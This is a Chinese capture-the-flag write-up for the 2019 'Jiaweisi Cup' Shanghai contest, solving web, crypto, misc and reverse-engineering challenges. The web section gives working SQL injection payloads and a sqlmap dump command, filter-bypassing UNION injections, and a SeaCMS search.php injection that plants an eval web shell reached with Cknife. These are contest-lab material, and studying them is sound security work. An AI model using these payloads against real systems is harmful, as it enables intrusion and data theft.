2019“嘉韦思杯”上海市网络安全邀请赛WriteUp
2019“嘉韦思杯”上海市网络安全邀请赛WriteUp
Web1 土肥原贤二 100pt
尝试提交 gid=1'报错, gid=1or1=1回显正常,直接使用 sqlmap进行测试,存在以下注入方式:
Parameter: gid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: gid=-4255' OR 8149=8149#
Vector: OR [INFERENCE]#
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: gid=3' OR (SELECT 3949 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(3949=3949,1))),0x7178787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Ilbj
Vector: OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: gid=3' OR SLEEP(5)-- XAjo
Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: gid=3' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a717671,0x4845486a6d6e79654d7a704461694b426771414872527a57624a724e78735943417a686b53664d6b,0x7178787a71)#
Vector: UNION ALL SELECT NULL,NULL,NULL,[QUERY]#Payload: sqlmap-u"http://47.103.43.235:81/quest/web/a/index.php?gid=1"-p gid-v3-D luozhen-T flag-C"id,flag"--dump.
Web2 戴星炳 200pt
2s快速提交正确结果即可获取flag,Python脚本:
import re
import requests
url = 'http://47.103.43.235:82/web/a/index.php'
r = requests.session()
text = r.get(url).text
calc = str(re.findall("</p><p>(.*?)</p>", text))[2:-2]
ans = eval(calc)
data = {'result':ans}
res = r.post(url, data)
print(res.text)运行结果:flag{Y0U4R33o_F4ST!}。
WriteUp记录到这里的时候主办方再次关闭了比赛官网,只开放题目链接,下面就各题目进行记录~
Web3 MD5碰撞
题目链接:http://47.103.43.235:85/a/
F12查看网页源代码发现以下注释PHP代码:
if ((string)$_POST['param1']!==(string)$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2']))两次比较( !==/ ===)均采用了比较严格的比较,无法通过弱类型的比较去绕过。
可以通过MD5碰撞生成器fastcoll_v1.0.0.5.exe.zip 来构造两个MD5值相同,但内容不同的字符串来绕过。
这里参考MD5碰撞-奶奶奶奶奶糖的样本提交进行测试~
Payload:
param1=
%D89%A4%FD%14%EC%0EL%1A%FEG%ED%5B%D0%C0%7D%CAh%16%B4%DFl%08Z%FA%1DA%05i%29%C4%FF%80%11%14%E8jk5%0DK%DAa%FC%2B%DC%9F%95ab%D2%09P%A1%5D%12%3B%1ETZ%AA%92%16y%29%CC%7DV%3A%FF%B8e%7FK%D6%CD%1D%DF/a%DE%27%29%EF%08%FC%C0%15%D1%1B%14%C1LYy%B2%F9%88%DF%E2%5B%9E%7D%04c%B1%B0%AFj%1E%7Ch%B0%96%A7%E5U%EBn1q%CA%D0%8B%C7%1BSP
¶m2=
%D89%A4%FD%14%EC%0EL%1A%FEG%ED%5B%D0%C0%7D%CAh%164%DFl%08Z%FA%1DA%05i%29%C4%FF%80%11%14%E8jk5%0DK%DAa%FC%2B%5C%A0%95ab%D2%09P%A1%5D%12%3B%1ET%DA%AA%92%16y%29%CC%7DV%3A%FF%B8e%7FK%D6%CD%1D%DF/a%DE%27%29o%08%FC%C0%15%D1%1B%14%C1LYy%B2%F9%88%DF%E2%5B%9E%7D%04c%B1%B0%AFj%9E%7Bh%B0%96%A7%E5U%EBn1q%CA%D0%0B%C7%1BSP
得到flag{MD5@_@success}。
Web4 SeaCMS
题目地址:http://47.103.43.235:84/
后台地址:http://47.103.43.235:84/admin/login.php
尝试弱口令登录后台,回显 admin用户不存在。
参考Seacms漏洞分析利用复现 By Assassin Search.php漏洞利用姿势,写入一句话木马,用Cknife连接之。
Payload:
http://47.103.43.235:84/search.php?searchtype=5&tid=&area=eval($_POST[cmd])
在根目录下发现flag.txt,获取flag{!!seacms_@@}。
Web5 Break the sha
题目地址:http://47.103.43.235:82/web/b/index.php
F12查看源代码发现 <!--index.phps-->,访问下载index.phps文件打开获取:
<?php
error_reporting(0);
$flag = '********';
if (isset($_POST['name']) and isset($_POST['password'])){
if ($_POST['name'] == $_POST['password'])
print 'name and password must be diffirent';
else if (sha1($_POST['name']) === sha1($_POST['password']))
die($flag);
else print 'invalid password';
}
?>name与password字段用 ==弱类型进行比较,sha1用 ===进行强类型比较,可以用数组绕过。
Payload:
name[]=1&password[]=2回显:flag{Y0ujustbr0ke_sha1}。
Web6 SQLi2
题目地址:http://47.103.43.235:83/web/a/index.php?id===QM
观察到 id===MQ,QM==是1的Base64编码,推测为Base64编码后逆序传值。
手工注入测试发现过滤了 and、 or、 select、 union关键字,去除了单引号、双引号、等号、空格等字符,可以双写绕过关键字的过滤,采用 /**/绕过空格,使用字符窜的hex编码绕过引号以及使用 regexp绕过等号。
- 爆数据库
-1/**/uniunionon/**/selselectect/**/1,group_concat(schema_name),3,4,5,6/**/from/**/infoorrmation_schema.schemata--
- 爆ctf_sql中的表
-1/**/uniunionon/**/selselectect/**/1,group_concat(table_name),3,4,5,6/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema/**/regexp/**/0x6374665f73716c--
- 爆flag中的列
-1/**/uniunionon/**/selselectect/**/1,group_concat(column_name),3,4,5,6/**/from/**/infoorrmation_schema.columns/**/where/**/table_name/**/regexp/**/0x666c6167--
- 获取flag
-1/**/uniunionon/**/selselectect/**/1,group_concat(flag),3,4,5,6/**/from/**/flag--
Crypto1 神秘代码
Vm0wd2QyUXlVWGxWV0d4V1YwZDRWMVl3WkRSWFJteFZVMjA1VjAxV2JETlhhMk0xVmpKS1NHVkVRbUZXVmxsM1ZqQmFTMlJIVmtkWGJGcHBWa1phZVZadGVGWmxSbGw1Vkd0c2FsSnRhRzlVVm1oRFZWWmFkR05GZEZSTlZXdzFWVEowVjFaWFNraGhSemxWVmpOT00xcFZXbXRXTVhCRlZXeHdWMDFFUlRCV2Fra3hVakZhV0ZOcmFGWmlhMHBYV1d4b1UwMHhWWGhYYlhSWFRWWndNRlZ0ZUZOVWJVWTJVbFJDVjJFeVRYaFdSRVpyVTBaT2NscEhjRk5XUjNob1YxZDRiMVV4VWtkWGJrNVlZbGhTV0ZSV1pEQk9iR3hXVjJ4T1ZXSkdjRlpXYlhoelZqRmFObEZZYUZkU1JYQklWbXBHVDFkV2NFZGhSMnhUWVROQ1dsWXhXbXROUjFGNVZXNU9hbEp0VWxsWmJGWmhZMnhXY1ZKdFJsUlNiR3cxVkZaU1UxWnJNWEpqUm1oV1RXNVNNMVpxU2t0V1ZrcFpXa1p3VjFKWVFrbFdiWEJIVkRGa1YyTkZaR2hTTW5oVVdWUk9RMWRzV1hoWGJYUk9VbTE0V0ZaWGRHdFdNV1JJWVVac1dtSkhhRlJXTUZwVFZqRndSMVJ0ZUdsU2JYY3hWa1phVTFVeFduSk5XRXBxVWxkNGFGVXdhRU5TUmxweFUydGFiRlpzU2xwWlZWcHJZVWRGZWxGcmJGZGlXRUpJVmtSS1UxWXhXblZWYldoVFlYcFdlbGRYZUc5aU1XUkhWMjVTVGxkSFVsWlVWbHBIVFRGU2MxWnRkRmRpVlhCNVdUQmFjMWR0U2tkWGJXaGFUVlp3ZWxreU1VZFNiRkp6Vkcxc1UySnJTbUZXTW5oWFdWWlJlRmRzYUZSaVJuQnhWV3hrVTFsV1VsWlhiVVpyWWtad2VGVnRkREJWTWtwSVZXcENXbFpXY0hKWlZXUkdaVWRPU0U5V2FHaE5WbkJ2Vm10U1MxUXlUWGxVYTFwaFVqSm9WRlJYTVc5bGJHUllaVWM1YVUxWFVucFdNV2h2VjBkS1dWVnJPVlppVkVVd1ZqQmFZVmRIVWtoa1JtUnBWbGhDU2xkV1ZtOVVNVnAwVW01S1QxWnNTbGhVVlZwM1ZrWmFjVkp0ZEd0V2JrSkhWR3hhVDJGV1NuUlBWRTVYVFc1b1dGbFVRWGhUUmtweVdrWm9hV0Y2Vm5oV1ZFSnZVVEZzVjFWc1dsaGlWVnB6V1d0YWQyVkdWWGxrUjNSb1lsVndWMWx1Y0V0V2JGbDZZVVJPV21FeVVrZGFWM2hIWTIxS1IyRkdhRlJTVlhCS1ZtMTBVMU14VlhoWFdHaFhZbXhhVjFsc2FFTldSbXhaWTBaa2EwMVdjREJaTUZZd1lWVXhXRlZyYUZkTmFsWlVWa2Q0UzFKc1pIVlRiRlpYWWtoQ05sWkhlR0ZaVm1SR1RsWmFVRlp0YUZSWmJGcExVMnhhYzFwRVVtcE5WMUl3VlRKMGIyRkdTbk5UYlVaVlZteHdNMVpyV21GalZrcDFXa1pPVGxacmIzZFhiRlpyWXpGVmVWTnNiRnBOTW1oWVZGWmFTMVZHY0VWU2EzQnNVbTFTV2xkclZURldNVnB6WTBaV1dGWXpVbkpXVkVaelZqRldjMWRzYUdsV1ZuQlFWa1phWVdReVZrZFdibEpzVTBkU2NGVnFRbmRXTVZsNVpFaGtWMDFFUmpGWlZWSlBWMjFGZVZWclpHRldNMmhJV1RKemVGWXhjRWRhUlRWT1VsaENTMVp0TVRCVk1VMTRWVzVTVjJFeVVtaFZNRnBoVmpGc2MxcEVVbGRTYlhoYVdUQmFhMWRHV25OalJteGFUVVpWTVZsV1ZYaFhSbFp6WVVaa1RsWXlhREpXTVZwaFV6RkplRlJ1VmxKaVJscFlXV3RvUTFkV1draGtSMFpvVFdzMWVsWXlOVk5oTVVsNVlVWm9XbFpGTlVSVk1WcHJWbFpHZEZKc1drNVdNVWwzVmxkNGIySXhXWGhhUldob1VtMW9WbFpzV25kTk1XeFdWMjVrVTJKSVFraFdSM2hUVlRKRmVsRllaRmhpUmxweVdYcEdWbVZXVG5KYVIyaE9UVzFvV1ZaR1l6RlZNV1JIVjJ4V1UyRXhjSE5WYlRGVFYyeGtjbFpVUmxkTmEzQktWVmMxYjFZeFdqWlNWRUpoVWtWYWNsVnFTa3RUVmxKMFlVWk9hR1ZzV2pSV2JUQjRaV3N4V0ZadVRsaGlSMmh4V2xkNFlWWXhVbGRYYlVaWFZteHdlbGxWYUd0V2F6RldWbXBTVjJKWVFtaFdiVEZHWkRGYWRWUnNWbGRTVlhCVVYxZDBWbVF5VVhoV2JGSlhWMGhDVkZWV1RsWmxiRXBFVmxod1UxRlRWWHBTUTFWNlVrRWxNMFFsTTBRJTNE在Base64解密不断进行B64解密得到:
fB__l621a4h4g_ai{&i}共20个字符,尝试进行4*5分列得到:
fB__
l621
a4h4
g_ai
{&i}得到flag{B64&2hai_14i}.
Crypto2 神秘代码2
脑洞题目~尝试进行移位变换最终检索到flag{c4es4r_variation},为凯撒移位的变种。
C++ Payload:
string s = "bg[`sZ*Zg'dPfP`VM_SXVd";
for(int diff = 0; diff <= 10; diff++) { //diff为4时得到flag{c4es4r_variation}
for(int i = 0; i < s.length(); i++) {
cout << char(s[i] + diff + i);
}
cout << endl;
}Crypto3 希尔密码
给出加密矩阵和密文求明文,这里可以参考希尔密码解密过程求出3*3解密矩阵:
[[8,16,27],[8,99 ,24],[27,24,27]],这里乘上3*4密文矩阵 [[23,10,12,24],[16,2,25,3,],[9,0,9,5]]得到矩阵:
对26进行取余后转化为字符打印得到 hillisflagxx,C++脚本:
#include <iostream>
using namespace std;
int a[12] = {683,112,739,375,1984,278,2787,609,1248,318,1167,855};
int main() {
for(int i = 0; i < 12; i++) {
cout << (char)('a' + a[i] % 26);
}
return 0;
}Crypto4 RSA256
题目地址:http://47.103.43.235:85/C/RSA256.tar.gz
下载解压后得到公钥gy.key和fllllllag.txt。
- 解法1
通过openssl查看公钥信息:
$ openssl rsa -pubin -in gy.key -text -modulus
Public-Key: (256 bit)
Modulus:
00:a9:bd:4c:7a:77:63:37:0a:04:2f:e6:be:c7:dd:
c8:41:60:2d:b9:42:c7:a3:62:d1:b5:d3:72:a4:d0:
89:12:d9
Exponent: 65537 (0x10001)
Modulus=A9BD4C7A7763370A042FE6BEC7DDC841602DB942C7A362D1B5D372A4D08912D9
writing RSA key
-----BEGIN PUBLIC KEY-----
MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAKm9THp3YzcKBC/mvsfdyEFgLblCx6Ni
0bXTcqTQiRLZAgMBAAE=
-----END PUBLIC KEY-----获取模数(Modulus) N=76775333340223961139427050707840417811156978085146970312315886671546666259161(0xA9BD4C7A7763370A042FE6BEC7DDC841602DB942C7A362D1B5D372A4D08912D9),以及公钥指数(Exponent)e=65537 (0x10001)。
模数N在http://factordb.com可在线分解为:
p = 273821108020968288372911424519201044333
q = 280385007186315115828483000867559983517已知n(可分解为p,q),e,c,可以计算出d后解密,Python脚本:
import gmpy2
import rsa
p = 273821108020968288372911424519201044333
q = 280385007186315115828483000867559983517
n = 76775333340223961139427050707840417811156978085146970312315886671546666259161
e = 65537
d = int(gmpy2.invert(e , (p-1)*(q-1)))
privatekey = rsa.PrivateKey(n , e , d , p , q)
with open("fllllllag.txt" , "rb") as f:
print(rsa.decrypt(f.read(), privatekey).decode())得到flag{2o!9CTFECUN}。
- 解法2
已知公钥gy.key和cipher message fllllllag.txt求解明文,这里尝试用RSACtfTool(项目地址:https://github.com/Ganapati/RsaCtfTool)直接进行解密:
D:\Tools\Crypto\RSACtfTool\RsaCtfTool
$ python2 RsaCtfTool.py --publickey gy.key --uncipherfile fllllllag.txt
[+] Clear text : b'\x00\x02c\x8bL\xc2u\x86\xc6\xbe\x00flag{_2o!9_CTF_ECUN_}'获取flag{2o!9CTFECUN}。
Misc1 奇怪的单点音
题目地址:http://47.103.43.235:85/d/奇怪的单点音.wav
播放音频有明显的杂音和3次嘟声,尝试用 Aduacity打开分析,观察频谱图发现flag字段:
Hint:主办方声明flag{85a9d4517d4725b98cbc9fd_554216}并非最终答案,请认真审题。
接下来就是脑洞部分,观察到字符串(含下划线)共32位,疑似MD5加密,尝试替换下划线为摩斯密码的t、以及字符串中未出现的数字,当下划线全替换为 0时在ChaMd5.org成功解密。
获取flag{hsd132456}.
Misc2 二维码
下载图片尝试使用 binwalk进行探测:
$ python binwalk index.png
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 256 x 256, 8-bit/color RGBA, non-interlaced
41 0x29 Zlib compressed data, compressed
5708 0x164C Zip archive data, encrypted at least v1.0 to extract, compressed size: 64, uncompressed size: 52, name: key.txt发现存在压缩包文件,得到Hint:解压密码为管理人员的QQ号,使用binwalk -e 分离后使用ARCHPR进行爆破。
获取密码 674290437,解压得到flag{d6@YX$_m^aa0}。
Misc3 jsfuck
题目地址: http://47.103.43.235:85/b/%E7%AC%AC%E4%B8%80%E9%A2%98_js%EF%BC%9F.txt
Base64解码后得到 jsfuck加密的js脚本,直接复制在控制台Console运行即可获取flag{sdf465454dfgert32}。
RE1 梅津美治郎
查壳无壳,为32位PE文件,在IDA中查看:
Level1基本没什么难度,进入Level2:
这里有个反调试函数,使用x86dbug调试会直接退出。但是使用OD或者吾爱破解版本的OD可以解决这个反调试函数。往后动态调试进到
其操作就是将
里的数据与0x2异或,然后与输入对比,相同即可。
a = [0x75,0x31,0x6e,0x6e,0x66,0x32,0x6c,0x67]
for i in a:
print (chr(i ^ 0x2),end = '')得到 w3lld0ne。
使用下划线连接,得到flag{r0b0RUlez!_w3lld0ne}.
RE2 76号
查看无壳为32位ELF文件。这个纯静态观察即可,查看字符串,这里有correct:
交叉引用,可以进入到main函数,这里阅读main函数,可以看到printf后再跟getline获取输入,再跟到后面一个check函数 0x804848f,然后根据返回结果判断是否正确。接下来进入到该check函数:
反编译check函数,是一个switch。函数的两个参数一个是我们输入的字符串地址,一个是0。寻找问题的关键点在于返回1.
注意每一个return,将可能返回1的return作为重点查看。例如:
在while循环的开头,每次会填充堆栈里的一个值为1,该值与我们输入有关。以v5[0]为起点。然后仔细阅读C代码,尝试:
发现符合程序流程。后续继续猜测令V2等于2的case,以此类推。4和8的比较特殊,后面都是手动验证,发现正确符合规律,获取flag{09vdf7wefijbk}~
Crypto&Misc&RE题目下载链接: https://pan.baidu.com/s/10tlJmUVZtekuYNgTi9eCNQ 提取码: bkiv
![jvm最全详解-05-JVM调优工具详解及调优实战[通俗易懂]](https://ask.qcloudimg.com/http-save/yehe-8223537/ccd3a12d051e0cb3e2f53e075769f1e1.png)
腾讯云开发者
